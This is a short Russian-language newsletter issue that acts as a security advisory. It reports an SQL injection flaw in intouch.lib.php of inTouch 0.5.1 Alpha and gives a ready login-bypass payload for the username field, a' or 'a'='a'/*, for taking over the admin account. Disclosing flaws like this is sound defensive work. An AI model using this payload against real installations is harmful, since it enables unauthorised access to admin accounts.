Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в inTouch.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
inTouch
ПО: inTouch
Версия: 0.5.1 Alpha

Описание:
Уязвимость скрипт:
intouch.lib.php
Уязвимость находится в $user и позволяет выполнить SQL-инъекцию для получения пароля администратора.
Обязательно: gpc_magic_quotes = off
Пример:
http://host/index.php

username: a' or 'a'='a'/*
password: anypassword
inTouch
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное